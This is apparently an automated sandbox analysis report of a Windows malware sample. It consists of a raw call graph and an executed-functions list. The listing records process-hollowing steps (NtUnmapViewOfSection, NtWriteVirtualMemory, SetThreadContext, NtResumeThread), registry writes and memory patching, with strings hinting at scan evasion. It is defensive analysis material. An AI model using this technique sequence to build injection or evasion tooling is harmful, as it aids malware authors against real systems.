36144 2984824 11 API calls 36143->36144 36145 29a7d63 36144->36145 36146 29847b0 11 API calls 36145->36146 36147 29a7d9a 36146->36147 36148 2997be8 17 API calls 36147->36148 36149 29a7dbe 36148->36149 36150 2997be8 17 API calls 36149->36150 36151 29a7df1 36150->36151 36152 2997be8 17 API calls 36151->36152 36153 29a7e24 36152->36153 36154 2997be8 17 API calls 36153->36154 36155 29a7e57 36154->36155 36156 2997be8 17 API calls 36155->36156 36157 29a7e8a 36156->36157 36158 2997be8 17 API calls 36157->36158 36159 29a7ebd 36158->36159 36160 2984824 11 API calls 36159->36160 36161 29a7ede 36160->36161 36162 29847b0 11 API calls 36161->36162 36163 29a7f15 36162->36163 36164 2997be8 17 API calls 36163->36164 36165 29a7f39 36164->36165 36166 2984824 11 API calls 36165->36166 36167 29a7f5a 36166->36167 36168 29847b0 11 API calls 36167->36168 36169 29a7f91 36168->36169 36170 2997be8 17 API calls 36169->36170 36171 29a7fb5 36170->36171 36172 2984824 11 API calls 36171->36172 36173 29a7fd6 36172->36173 36174 29847b0 11 API calls 36173->36174 36175 29a800d 36174->36175 36176 2997be8 17 API calls 36175->36176 36177 29a8031 36176->36177 36178 2984824 11 API calls 36177->36178 36179 29a8052 36178->36179 36180 29847b0 11 API calls 36179->36180 36181 29a8089 36180->36181 36182 2997be8 17 API calls 36181->36182 36183 29a80ad 36182->36183 36184 2984824 11 API calls 36183->36184 36185 29a80ce 36184->36185 36186 29847b0 11 API calls 36185->36186 36187 29a8105 36186->36187 36188 2997be8 17 API calls 36187->36188 36189 29a8129 36188->36189 36190 2997be8 17 API calls 36189->36190 36191 29a8138 36190->36191 36192 2997be8 17 API calls 36191->36192 36193 29a8147 36192->36193 36194 2997be8 17 API calls 36193->36194 36195 29a8156 36194->36195 36196 2997be8 17 API calls 36195->36196 36197 29a8165 36196->36197 36198 2997be8 17 API calls 36197->36198 36199 29a8174 36198->36199 36200 2997be8 17 API calls 36199->36200 36201 29a8183 36200->36201 36202 2997be8 17 API calls 36201->36202 36203 29a8192 36202->36203 36204 2997be8 17 API calls 36203->36204 36205 29a81a1 36204->36205 36206 2997be8 17 API calls 36205->36206 36207 29a81b0 36206->36207 36208 2997be8 17 API calls 36207->36208 36209 29a81bf 36208->36209 36210 2997be8 17 API calls 36209->36210 36211 29a81ce 36210->36211 36212 2997be8 17 API calls 36211->36212 36213 29a81dd 36212->36213 36214 2997be8 17 API calls 36213->36214 36215 29a81ec 36214->36215 36216 2997be8 17 API calls 36215->36216 36217 29a81fb 36216->36217 36218 2997be8 17 API calls 36217->36218 36219 29a820a 36218->36219 36220 2984824 11 API calls 36219->36220 36221 29a822b 36220->36221 36222 29847b0 11 API calls 36221->36222 36223 29a8262 36222->36223 36224 2997be8 17 API calls 36223->36224 36225 29a8286 36224->36225 36226 2984824 11 API calls 36225->36226 36227 29a82a7 36226->36227 36228 29847b0 11 API calls 36227->36228 36229 29a82de 36228->36229 36230 2997be8 17 API calls 36229->36230 36231 29a8302 36230->36231 36232 2984824 11 API calls 36231->36232 36233 29a8323 36232->36233 36234 29847b0 11 API calls 36233->36234 36235 29a835a 36234->36235 36236 2997be8 17 API calls 36235->36236 36237 29a837e 36236->36237 36238 2997be8 17 API calls 36237->36238 36239 29a83b1 36238->36239 36240 2997be8 17 API calls 36239->36240 36241 29a83e4 36240->36241 36242 2997be8 17 API calls 36241->36242 36243 29a8417 36242->36243 36244 2997be8 17 API calls 36243->36244 36245 29a844a 36244->36245 36246 2997be8 17 API calls 36245->36246 36247 29a847d 36246->36247 36248 2997be8 17 API calls 36247->36248 36249 29a84b0 36248->36249 36250 2997be8 17 API calls 36249->36250 36251 29a84e3 36250->36251 36252 2984824 11 API calls 36251->36252 36253 29a8504 36252->36253 36254 29847b0 11 API calls 36253->36254 36255 29a853b 36254->36255 36256 2997be8 17 API calls 36255->36256 36257 29a855f 36256->36257 36258 2984824 11 API calls 36257->36258 36259 29a8580 36258->36259 36260 29847b0 11 API calls 36259->36260 36261 29a85b7 36260->36261 36262 2997be8 17 API calls 36261->36262 36263 29a85db 36262->36263 36264 2984824 11 API calls 36263->36264 36265 29a85fc 36264->36265 36266 29847b0 11 API calls 36265->36266 36267 29a8633 36266->36267 36268 2997be8 17 API calls 36267->36268 36269 29a8657 36268->36269 36270 2997be8 17 API calls 36269->36270 36271 29a868a 36270->36271 36272 2997be8 17 API calls 36271->36272 36273 29a86bd 36272->36273 36274 2997be8 17 API calls 36273->36274 36275 29a86f0 36274->36275 36276 2997be8 17 API calls 36275->36276 36277 29a8723 36276->36277 36278 2997be8 17 API calls 36277->36278 36279 29a8756 36278->36279 36280 2997be8 17 API calls 36279->36280 36281 29a8789 36280->36281 36282 2997be8 17 API calls 36281->36282 36283 29a87bc 36282->36283 36284 2997be8 17 API calls 36283->36284 36285 29a87ef 36284->36285 36286 2997be8 17 API calls 36285->36286 36287 29a8822 36286->36287 36288 2997be8 17 API calls 36287->36288 36289 29a8855 36288->36289 36290 2997be8 17 API calls 36289->36290 36291 29a8888 36290->36291 36292 2997be8 17 API calls 36291->36292 36293 29a88bb 36292->36293 36294 2997be8 17 API calls 36293->36294 36295 29a88ee 36294->36295 36296 2997be8 17 API calls 36295->36296 36297 29a8921 36296->36297 36298 2997be8 17 API calls 36297->36298 36299 29a8954 36298->36299 36300 2997be8 17 API calls 36299->36300 36301 29a8987 36300->36301 36302 2997be8 17 API calls 36301->36302 36303 29a89ba 36302->36303 36304 2997be8 17 API calls 36303->36304 36305 29a89ed 36304->36305 36306 2997be8 17 API calls 36305->36306 36307 29a8a20 36306->36307 36308 2984824 11 API calls 36307->36308 36309 29a8a41 36308->36309 36310 29847b0 11 API calls 36309->36310 36311 29a8a78 36310->36311 36312 2997be8 17 API calls 36311->36312 36313 29a8a9c 36312->36313 36314 2984824 11 API calls 36313->36314 36315 29a8abd 36314->36315 36316 29847b0 11 API calls 36315->36316 36317 29a8af4 36316->36317 36318 2997be8 17 API calls 36317->36318 36319 29a8b18 36318->36319 36320 2984824 11 API calls 36319->36320 36321 29a8b39 36320->36321 36322 29847b0 11 API calls 36321->36322 36323 29a8b70 36322->36323 36324 2997be8 17 API calls 36323->36324 36325 29a8b94 ExitProcess 36324->36325 36327 29847b4 36326->36327 36328 2984815 36326->36328 36329 29847bc 36327->36329 36330 29844f4 36327->36330 36329->36328 36331 29847cb 36329->36331 36333 29844f4 11 API calls 36329->36333 36334 2984564 11 API calls 36330->36334 36336 2984508 36330->36336 36335 2984564 11 API calls 36331->36335 36332 2984536 36332->35603 36333->36331 36334->36336 36338 29847e5 36335->36338 36336->36332 36337 2982c2c 11 API calls 36336->36337 36337->36332 36339 29844f4 11 API calls 36338->36339 36340 2984811 36339->36340 36340->35603 36342 2997bfd 36341->36342 36343 2997c05 LoadLibraryW GetModuleHandleW 36342->36343 36772 2984964 36343->36772 36347 2997c57 36783 29844c4 36347->36783 36351 299d32f 36350->36351 36352 299d35a RegOpenKeyA 36351->36352 36353 299d368 36352->36353 36354 29849bc 11 API calls 36353->36354 36355 299d380 36354->36355 36356 299d38d RegSetValueExA RegCloseKey 36355->36356 36357 299d3b1 36356->36357 36358 29844c4 11 API calls 36357->36358 36359 299d3be 36358->36359 36360 29844a0 11 API calls 36359->36360 36361 299d3c6 36360->36361 36361->35634 36364 299d1bd 36362->36364 36363 299d1e9 36365 29844a0 11 API calls 36363->36365 36364->36363 36791 2984688 11 API calls 36364->36791 36792 29844f4 11 API calls 36364->36792 36367 299d1fe 36365->36367 36367->35876 36370 2984964 36369->36370 36371 2987e22 GetFileAttributesA 36370->36371 36372 2987e2d 36371->36372 36372->35940 36372->35942 36374 2984b90 11 API calls 36373->36374 36375 299c764 36374->36375 36376 299c785 36375->36376 36377 29849bc 11 API calls 36375->36377 36376->36034 36377->36375 36379 299c40e 36378->36379 36793 2984ee4 36379->36793 36381 299c416 36382 299c436 RtlDosPathNameToNtPathName_U 36381->36382 36799 299c340 36382->36799 36384 299c452 NtCreateFile 36385 299c47d 36384->36385 36386 29849bc 11 API calls 36385->36386 36387 299c48f NtWriteFile NtClose 36386->36387 36388 299c4b9 36387->36388 36800 2984c24 36388->36800 36391 29844a0 11 API calls 36392 299c4c9 36391->36392 36392->35940 36394 2984970 36393->36394 36395 2984564 11 API calls 36394->36395 36396 29849ab 36394->36396 36397 2984987 36395->36397 36399 2997f48 36396->36399 36397->36396 36398 2982c2c 11 API calls 36397->36398 36398->36396 36400 2997f50 36399->36400 36401 2984824 11 API calls 36400->36401 36402 2997f93 36401->36402 36403 29847b0 11 API calls 36402->36403 36404 2997fb8 36403->36404 36405 2997be8 17 API calls 36404->36405 36406 2997fd3 36405->36406 36407 2984824 11 API calls 36406->36407 36408 2997fec 36407->36408 36409 29847b0 11 API calls 36408->36409 36410 2998011 36409->36410 36411 2997be8 17 API calls 36410->36411 36412 299802c 36411->36412 36413 29999ab 36412->36413 36414 2984824 11 API calls 36412->36414 36415 29844c4 11 API calls 36413->36415 36418 299805d 36414->36418 36416 29999c8 36415->36416 36417 29844c4 11 API calls 36416->36417 36419 29999d8 36417->36419 36422 29847b0 11 API calls 36418->36422 36420 2984c24 SysFreeString 36419->36420 36421 29999e3 36420->36421 36423 29844c4 11 API calls 36421->36423 36427 2998082 36422->36427 36424 29999f3 36423->36424 36425 29844a0 11 API calls 36424->36425 36426 29999fb 36425->36426 36428 29844c4 11 API calls 36426->36428 36430 2997be8 17 API calls 36427->36430 36429 2999a08 36428->36429 36432 29844c4 11 API calls 36429->36432 36431 299809d 36430->36431 36433 2984824 11 API calls 36431->36433 36434 2999a15 36432->36434 36435 29980b6 36433->36435 36434->35795 36436 29847b0 11 API calls 36435->36436 36437 29980db 36436->36437 36438 2997be8 17 API calls 36437->36438 36439 29980f6 36438->36439 36439->36413 36440 2984824 11 API calls 36439->36440 36441 299813e 36440->36441 36442 29847b0 11 API calls 36441->36442 36443 2998163 36442->36443 36444 2997be8 17 API calls 36443->36444 36445 299817e 36444->36445 36446 2984824 11 API calls 36445->36446 36447 2998197 36446->36447 36448 29847b0 11 API calls 36447->36448 36449 29981bc 36448->36449 36450 2997be8 17 API calls 36449->36450 36451 29981d7 36450->36451 36452 2984824 11 API calls 36451->36452 36453 299821c 36452->36453 36454 29847b0 11 API calls 36453->36454 36455 2998241 36454->36455 36456 2997be8 17 API calls 36455->36456 36457 299825c 36456->36457 36458 2984824 11 API calls 36457->36458 36459 2998275 36458->36459 36460 29847b0 11 API calls 36459->36460 36461 299829d 36460->36461 36462 2997be8 17 API calls 36461->36462 36463 29982bb 36462->36463 36464 2984824 11 API calls 36463->36464 36465 29982d7 36464->36465 36466 29847b0 11 API calls 36465->36466 36467 2998308 36466->36467 36468 2997be8 17 API calls 36467->36468 36469 299832c 36468->36469 36470 2984824 11 API calls 36469->36470 36471 2998348 36470->36471 36472 29847b0 11 API calls 36471->36472 36473 2998379 36472->36473 36474 2997be8 17 API calls 36473->36474 36475 299839d 36474->36475 36476 2984824 11 API calls 36475->36476 36477 29983b9 36476->36477 36478 29847b0 11 API calls 36477->36478 36479 29983ea 36478->36479 36480 2997be8 17 API calls 36479->36480 36481 299840e 36480->36481 36482 299843d CreateProcessAsUserW 36481->36482 36483 299844f 36482->36483 36484 29984c0 36482->36484 36486 2984824 11 API calls 36483->36486 36485 2984824 11 API calls 36484->36485 36487 29984dc 36485->36487 36488 299846b 36486->36488 36490 29847b0 11 API calls 36487->36490 36489 29847b0 11 API calls 36488->36489 36492 299849c 36489->36492 36491 299850d 36490->36491 36493 2997be8 17 API calls 36491->36493 36494 2997be8 17 API calls 36492->36494 36495 2998531 36493->36495 36494->36484 36496 2997be8 17 API calls 36495->36496 36497 2998564 36496->36497 36498 2984824 11 API calls 36497->36498 36499 2998580 36498->36499 36500 29847b0 11 API calls 36499->36500 36501 29985b1 36500->36501 36502 2997be8 17 API calls 36501->36502 36503 29985d5 36502->36503 36504 2984824 11 API calls 36503->36504 36505 29985f1 36504->36505 36506 29847b0 11 API calls 36505->36506 36507 2998622 36506->36507 36508 2997be8 17 API calls 36507->36508 36509 2998646 36508->36509 36510 2982ee0 2 API calls 36509->36510 36511 299864b 36510->36511 36512 2984824 11 API calls 36511->36512 36513 2998693 36512->36513 36514 29847b0 11 API calls 36513->36514 36515 29986c4 36514->36515 36516 2997be8 17 API calls 36515->36516 36517 29986e8 36516->36517 36518 2984824 11 API calls 36517->36518 36519 2998704 36518->36519 36520 29847b0 11 API calls 36519->36520 36521 2998735 36520->36521 36522 2997be8 17 API calls 36521->36522 36523 2998759 36522->36523 36524 2984824 11 API calls 36523->36524 36525 2998775 36524->36525 36526 29847b0 11 API calls 36525->36526 36527 29987a6 36526->36527 36528 2997be8 17 API calls 36527->36528 36529 29987ca GetThreadContext 36528->36529 36529->36413 36530 29987ec 36529->36530 36531 2984824 11 API calls 36530->36531 36532 2998808 36531->36532 36533 29847b0 11 API calls 36532->36533 36534 2998839 36533->36534 36535 2997be8 17 API calls 36534->36535 36536 299885d 36535->36536 36537 2984824 11 API calls 36536->36537 36538 2998879 36537->36538 36539 29847b0 11 API calls 36538->36539 36540 29988aa 36539->36540 36541 2997be8 17 API calls 36540->36541 36542 29988ce 36541->36542 36543 2984824 11 API calls 36542->36543 36544 29988ea 36543->36544 36545 29847b0 11 API calls 36544->36545 36546 299891b 36545->36546 36547 2997be8 17 API calls 36546->36547 36548 299893f 36547->36548 36549 2984824 11 API calls 36548->36549 36550 299895b 36549->36550 36551 29847b0 11 API calls 36550->36551 36552 299898c 36551->36552 36553 2997be8 17 API calls 36552->36553 36554 29989b0 36553->36554 36555 2984824 11 API calls 36554->36555 36556 29989cc 36555->36556 36557 29847b0 11 API calls 36556->36557 36558 29989fd 36557->36558 36559 2997be8 17 API calls 36558->36559 36560 2998a21 NtReadVirtualMemory 36559->36560 36561 2998d5c 36560->36561 36562 2998a55 36560->36562 36563 2984824 11 API calls 36561->36563 36564 2984824 11 API calls 36562->36564 36566 2998d78 36563->36566 36565 2998a71 36564->36565 36568 29847b0 11 API calls 36565->36568 36567 29847b0 11 API calls 36566->36567 36569 2998da9 36567->36569 36570 2998aa2 36568->36570 36571 2997be8 17 API calls 36569->36571 36572 2997be8 17 API calls 36570->36572 36573 2998d55 36571->36573 36574 2998ac6 36572->36574 36575 2984824 11 API calls 36573->36575 36576 2984824 11 API calls 36574->36576 36578 2998de9 36575->36578 36577 2998ae2 36576->36577 36579 29847b0 11 API calls 36577->36579 36580 29847b0 11 API calls 36578->36580 36582 2998b13 36579->36582 36581 2998e1a 36580->36581 36583 2997be8 17 API calls 36581->36583 36584 2997be8 17 API calls 36582->36584 36585 2998e3e 36583->36585 36586 2998b37 36584->36586 36587 2984824 11 API calls 36585->36587 36588 2984824 11 API calls 36586->36588 36589 2998e5a 36587->36589 36590 2998b53 36588->36590 36592 29847b0 11 API calls 36589->36592 36591 29847b0 11 API calls 36590->36591 36594 2998b84 36591->36594 36593 2998e8b 36592->36593 36595 2997be8 17 API calls 36593->36595 36596 2997be8 17 API calls 36594->36596 36597 2998eaf 36595->36597 36598 2998ba8 NtUnmapViewOfSection 36596->36598 36599 2984824 11 API calls 36597->36599 36600 2998be8 36598->36600 36601 2998bc0 36598->36601 36605 2998ecb 36599->36605 36603 2984824 11 API calls 36600->36603 36803 2997968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36601->36803 36607 2998c04 36603->36607 36604 2998be1 36606 2984824 11 API calls 36604->36606 36608 29847b0 11 API calls 36605->36608 36610 2998c75 36606->36610 36609 29847b0 11 API calls 36607->36609 36612 2998efc 36608->36612 36613 2998c35 36609->36613 36611 29847b0 11 API calls 36610->36611 36618 2998ca6 36611->36618 36614 2997be8 17 API calls 36612->36614 36616 2997be8 17 API calls 36613->36616 36615 2998f20 36614->36615 36805 2997968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36615->36805 36616->36604 36620 2997be8 17 API calls 36618->36620 36619 2998f41 36619->36413 36621 2984824 11 API calls 36619->36621 36622 2998cca 36620->36622 36624 2998f6f 36621->36624 36623 2984824 11 API calls 36622->36623 36625 2998ce6 36623->36625 36626 29847b0 11 API calls 36624->36626 36627 29847b0 11 API calls 36625->36627 36628 2998fa0 36626->36628 36629 2998d17 36627->36629 36630 2997be8 17 API calls 36628->36630 36632 2997be8 17 API calls 36629->36632 36631 2998fc4 36630->36631 36633 2984824 11 API calls 36631->36633 36634 2998d3b 36632->36634 36636 2998fe0 36633->36636 36804 2997968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36634->36804 36637 29847b0 11 API calls 36636->36637 36638 2999011 36637->36638 36639 2997be8 17 API calls 36638->36639 36640 2999035 36639->36640 36806 2997e58 36640->36806 36642 2984824 11 API calls 36644 29990bc 36642->36644 36643 299903c 36643->36642 36645 29847b0 11 API calls 36644->36645 36646 29990ed 36645->36646 36647 2997be8 17 API calls 36646->36647 36648 2999111 36647->36648 36649 2984824 11 API calls 36648->36649 36650 299912d 36649->36650 36651 29847b0 11 API calls 36650->36651 36652 299915e 36651->36652 36653 2997be8 17 API calls 36652->36653 36654 2999182 36653->36654 36655 2984824 11 API calls 36654->36655 36656 299919e 36655->36656 36657 29847b0 11 API calls 36656->36657 36658 29991cf 36657->36658 36659 2997be8 17 API calls 36658->36659 36660 29991f3 NtWriteVirtualMemory 36659->36660 36661 2984824 11 API calls 36660->36661 36662 299922c 36661->36662 36663 29847b0 11 API calls 36662->36663 36664 299925d 36663->36664 36665 2997be8 17 API calls 36664->36665 36666 2999281 36665->36666 36667 2984824 11 API calls 36666->36667 36668 299929d 36667->36668 36669 29847b0 11 API calls 36668->36669 36670 29992ce 36669->36670 36671 2997be8 17 API calls 36670->36671 36672 29992f2 36671->36672 36673 2984824 11 API calls 36672->36673 36674 299930e 36673->36674 36675 29847b0 11 API calls 36674->36675 36676 299933f 36675->36676 36677 2997be8 17 API calls 36676->36677 36678 2999363 NtWriteVirtualMemory 36677->36678 36679 2984824 11 API calls 36678->36679 36680 299939f 36679->36680 36681 29847b0 11 API calls 36680->36681 36682 29993d0 36681->36682 36683 2997be8 17 API calls 36682->36683 36684 29993f4 36683->36684 36685 2984824 11 API calls 36684->36685 36686 2999410 36685->36686 36687 29847b0 11 API calls 36686->36687 36688 2999441 36687->36688 36689 2997be8 17 API calls 36688->36689 36690 2999465 36689->36690 36691 2984824 11 API calls 36690->36691 36692 2999481 36691->36692 36693 29847b0 11 API calls 36692->36693 36694 29994b2 36693->36694 36695 2997be8 17 API calls 36694->36695 36696 29994d6 SetThreadContext NtResumeThread 36695->36696 36697 2984824 11 API calls 36696->36697 36698 2999522 36697->36698 36699 29847b0 11 API calls 36698->36699 36700 2999553 36699->36700 36701 2997be8 17 API calls 36700->36701 36702 2999577 36701->36702 36703 2984824 11 API calls 36702->36703 36704 2999593 36703->36704 36705 29847b0 11 API calls 36704->36705 36706 29995c4 36705->36706 36707 2997be8 17 API calls 36706->36707 36708 29995e8 36707->36708 36709 2984824 11 API calls 36708->36709 36710 2999604 36709->36710 36711 29847b0 11 API calls 36710->36711 36712 2999635 36711->36712 36713 2997be8 17 API calls 36712->36713 36714 2999659 36713->36714 36715 2984824 11 API calls 36714->36715 36716 2999675 36715->36716 36717 29847b0 11 API calls 36716->36717 36718 29996a6 36717->36718 36719 2997be8 17 API calls 36718->36719 36720 29996ca 36719->36720 36721 2982c2c 11 API calls 36720->36721 36722 29996d9 36721->36722 36723 2984824 11 API calls 36722->36723 36724 29996fb 36723->36724 36725 29847b0 11 API calls 36724->36725 36726 299972c 36725->36726 36727 2997be8 17 API calls 36726->36727 36728 2999750 36727->36728 36809 2997ac0 LoadLibraryW 36728->36809 36731 2997ac0 4 API calls 36732 2999778 36731->36732 36733 2997ac0 4 API calls 36732->36733 36734 299978c 36733->36734 36735 2984824 11 API calls 36734->36735 36736 29997a8 36735->36736 36737 29847b0 11 API calls 36736->36737 36738 29997d9 36737->36738 36739 2997be8 17 API calls 36738->36739 36740 29997fd 36739->36740 36741 2997ac0 4 API calls 36740->36741 36742 2999811 36741->36742 36743 2997ac0 4 API calls 36742->36743 36744 2999825 36743->36744 36745 2984824 11 API calls 36744->36745 36746 2999841 36745->36746 36747 29847b0 11 API calls 36746->36747 36748 299985f 36747->36748 36749 2997ac0 4 API calls 36748->36749 36750 2999877 36749->36750 36751 2984824 11 API calls 36750->36751 36752 2999893 36751->36752 36753 29847b0 11 API calls 36752->36753 36754 29998b1 36753->36754 36755 2997ac0 4 API calls 36754->36755 36756 29998c9 36755->36756 36757 2984824 11 API calls 36756->36757 36758 29998e5 36757->36758 36759 29847b0 11 API calls 36758->36759 36760 2999916 36759->36760 36761 2997be8 17 API calls 36760->36761 36762 299993a 36761->36762 36763 2984824 11 API calls 36762->36763 36764 2999956 36763->36764 36765 29847b0 11 API calls 36764->36765 36766 2999987 36765->36766 36767 2997be8 17 API calls 36766->36767 36767->36413 36768->35783 36769->35928 36770->36098 36771->35947 36773 2984968 GetProcAddress 36772->36773 36774 2997b20 36773->36774 36787 2984538 36774->36787 36777 29847b0 11 API calls 36778 2997b53 36777->36778 36779 2997b5b GetModuleHandleA GetProcAddress VirtualProtect 36778->36779 36780 2997b97 36779->36780 36781 29844c4 11 API calls 36780->36781 36782 2997ba4 36781->36782 36782->36347 36785 29844ca 36783->36785 36784 29844f0 36784->35606 36785->36784 36786 2982c2c 11 API calls 36785->36786 36786->36785 36788 298453c 36787->36788 36789 2984560 36788->36789 36790 2982c2c 11 API calls 36788->36790 36789->36777 36790->36789 36791->36364 36792->36364 36794 2984eea SysAllocStringLen 36793->36794 36795 2984f00 36793->36795 36794->36795 36796 2984bf4 36794->36796 36795->36381 36797 2984c10 36796->36797 36798 2984c00 SysAllocStringLen 36796->36798 36797->36381 36798->36796 36798->36797 36799->36384 36801 2984c38 36800->36801 36802 2984c2a SysFreeString 36800->36802 36801->36391 36802->36801 36803->36604 36804->36573 36805->36619 36807 2982c10 11 API calls 36806->36807 36808 2997e8e 36807->36808 36808->36643 36810 2997b0a 36809->36810 36811 2997add GetProcAddress 36809->36811 36810->36731 36812 2997ae8 NtWriteVirtualMemory 36811->36812 36813 2997b04 FreeLibrary 36811->36813 36812->36813 36814 2997b02 36812->36814 36813->36810 36814->36813 36815 2981c6c 36816 2981c7c 36815->36816 36817 2981d04 36815->36817 36818 2981c89 36816->36818 36819 2981cc0 36816->36819 36820 2981f58 36817->36820 36821 2981d0d 36817->36821 36823 2981c94 36818->36823 36863 2981724 36818->36863 36822 2981724 10 API calls 36819->36822 36824 2981fec 36820->36824 36830 2981f68 36820->36830 36831 2981fac 36820->36831 36825 2981e24 36821->36825 36826 2981d25 36821->36826 36828 2981cd7 36822->36828 36840 2981e7c 36825->36840 36841 2981e55 Sleep 36825->36841 36849 2981e95 36825->36849 36827 2981d2c 36826->36827 36833 2981d48 36826->36833 36836 2981dfc 36826->36836 36848 2981a8c 8 API calls 36828->36848 36853 2981cfd 36828->36853 36835 2981724 10 API calls 36830->36835 36834 2981fb2 36831->36834 36837 2981724 10 API calls 36831->36837 36832 2981724 10 API calls 36852 2981f2c 36832->36852 36842 2981d79 Sleep 36833->36842 36846 2981d9c 36833->36846 36854 2981f82 36835->36854 36838 2981724 10 API calls 36836->36838 36855 2981fc1 36837->36855 36857 2981e05 36838->36857 36839 2981fa7 36840->36832 36840->36849 36841->36840 36844 2981e6f Sleep 36841->36844 36845 2981d91 Sleep 36842->36845 36842->36846 36843 2981ca1 36851 2981cb9 36843->36851 36887 2981a8c 36843->36887 36844->36825 36845->36833 36847 2981e1d 36848->36853 36852->36849 36856 2981a8c 8 API calls 36852->36856 36854->36839 36858 2981a8c 8 API calls 36854->36858 36855->36839 36859 2981a8c 8 API calls 36855->36859 36860 2981f50 36856->36860 36857->36847 36861 2981a8c 8 API calls 36857->36861 36858->36839 36862 2981fe4 36859->36862 36861->36847 36864 2981968 36863->36864 36873 298173c 36863->36873 36866 2981a80 36864->36866 36867 2981938 36864->36867 36865 298174e 36868 298175d 36865->36868 36878 298182c 36865->36878 36881 298180a Sleep 36865->36881 36869 2981a89 36866->36869 36870 2981684 VirtualAlloc 36866->36870 36872 2981947 Sleep 36867->36872 36876 2981986 36867->36876 36868->36843 36869->36843 36871 29816af 36870->36871 36879 29816bf 36870->36879 36904 2981644 36871->36904 36875 298195d Sleep 36872->36875 36872->36876 36873->36865 36877 29817cb Sleep 36873->36877 36875->36867 36882 29815cc VirtualAlloc 36876->36882 36884 29819a4 36876->36884 36877->36865 36880 29817e4 Sleep 36877->36880 36886 2981838 36878->36886 36910 29815cc 36878->36910 36879->36843 36880->36873 36881->36878 36883 2981820 Sleep 36881->36883 36882->36884 36883->36865 36884->36843 36886->36843 36888 2981b6c 36887->36888 36889 2981aa1 36887->36889 36890 29816e8 36888->36890 36891 2981aa7 36888->36891 36889->36891 36893 2981b13 Sleep 36889->36893 36892 2981c66 36890->36892 36895 2981644 2 API calls 36890->36895 36894 2981ab0 36891->36894 36897 2981b4b Sleep 36891->36897 36900 2981b81 36891->36900 36892->36851 36893->36891 36896 2981b2d Sleep 36893->36896 36894->36851 36898 29816f5 VirtualFree 36895->36898 36896->36889 36899 2981b61 Sleep 36897->36899 36897->36900 36901 298170d 36898->36901 36899->36891 36902 2981ba4 36900->36902 36903 2981c00 VirtualFree 36900->36903 36901->36851 36902->36851 36903->36851 36905 2981681 36904->36905 36906 298164d 36904->36906 36905->36879 36906->36905 36907 298164f Sleep 36906->36907 36908 2981664 36907->36908 36908->36905 36909 2981668 Sleep 36908->36909 36909->36906 36914 2981560 36910->36914 36912 29815d4 VirtualAlloc 36913 29815eb 36912->36913 36913->36886 36915 2981500 36914->36915 36915->36912 36916 2984ea0 36917 2984ead 36916->36917 36921 2984eb4 36916->36921 36925 2984bf4 SysAllocStringLen 36917->36925 36922 2984c14 36921->36922 36923 2984c1a SysFreeString 36922->36923 36924 2984c20 36922->36924 36923->36924 36925->36921 36926 2984c60 36927 2984c64 36926->36927 36928 2984c87 36926->36928 36929 2984c24 36927->36929 36932 2984c77 SysReAllocStringLen 36927->36932 36930 2984c38 36929->36930 36931 2984c2a SysFreeString 36929->36931 36931->36930 36932->36928 36933 2984bf4 36932->36933 36934 2984c10 36933->36934 36935 2984c00 SysAllocStringLen 36933->36935 36935->36933 36935->36934 36936 29a1ac0 36937 2984824 11 API calls 36936->36937 36938 29a1ae1 36937->36938 36939 29a1aec 36938->36939 36940 29a1af9 36939->36940 36941 29847b0 11 API calls 36940->36941 36942 29a1b18 36941->36942 36943 2984964 36942->36943 36944 29a1b23 36943->36944 38373 2984698 36944->38373 38374 298469e 38373->38374 38375 29aa2f4 38385 2986530 38375->38385 38379 29aa322 38390 29a9b54 timeSetEvent 38379->38390 38381 29aa32c 38382 29aa33a GetMessageA 38381->38382 38383 29aa32e TranslateMessage DispatchMessageA 38382->38383 38384 29aa34a 38382->38384 38383->38382 38386 298653b 38385->38386 38391 298415c 38386->38391 38389 2984270 SysAllocStringLen SysFreeString SysReAllocStringLen 38389->38379 38390->38381 38392 29841a2 38391->38392 38393 298421b 38392->38393 38397 29843ac 38392->38397 38405 29840f4 38393->38405 38396 29843dd 38410 2984320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38396->38410 38397->38396 38400 29843ee 38397->38400 38399 29843e7 38399->38400 38401 2984433 FreeLibrary 38400->38401 38402 2984457 38400->38402 38401->38400 38403 2984460 38402->38403 38404 2984466 ExitProcess 38402->38404 38403->38404 38406 2984104 38405->38406 38407 2984137 38405->38407 38406->38407 38409 29815cc VirtualAlloc 38406->38409 38411 298582c 38406->38411 38407->38389 38409->38406 38410->38399 38412 298583c GetModuleFileNameA 38411->38412 38414 2985858 38411->38414 38415 2985a90 GetModuleFileNameA RegOpenKeyExA 38412->38415 38414->38406 38416 2985b13 38415->38416 38417 2985ad3 RegOpenKeyExA 38415->38417 38433 29858cc 12 API calls 38416->38433 38417->38416 38418 2985af1 RegOpenKeyExA 38417->38418 38418->38416 38420 2985b9c lstrcpynA GetThreadLocale GetLocaleInfoA 38418->38420 38424 2985bd3 38420->38424 38425 2985cb6 38420->38425 38421 2985b38 RegQueryValueExA 38422 2985b58 RegQueryValueExA 38421->38422 38423 2985b76 RegCloseKey 38421->38423 38422->38423 38423->38414 38424->38425 38426 2985be3 lstrlenA 38424->38426 38425->38414 38428 2985bfb 38426->38428 38428->38425 38429 2985c48 38428->38429 38430 2985c20 lstrcpynA LoadLibraryExA 38428->38430 38429->38425 38431 2985c52 lstrcpynA LoadLibraryExA 38429->38431 38430->38429 38431->38425 38432 2985c84 lstrcpynA LoadLibraryExA 38431->38432 38432->38425 38433->38421

                                                                                                                            Executed Functions

                                                                                                                            Function 0299D5D0 Relevance: 218.7, APIs: 9, Strings: 111, Instructions: 8669COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InetIsOffline.URL(00000000,00000000,029A8FB6,?,?,?,00000000,00000000), ref: 0299D604
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                              • Part of subcall function 02987E18: GetFileAttributesA.KERNEL32(00000000,?,0299E0EE,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,UacInitialize), ref: 02987E23
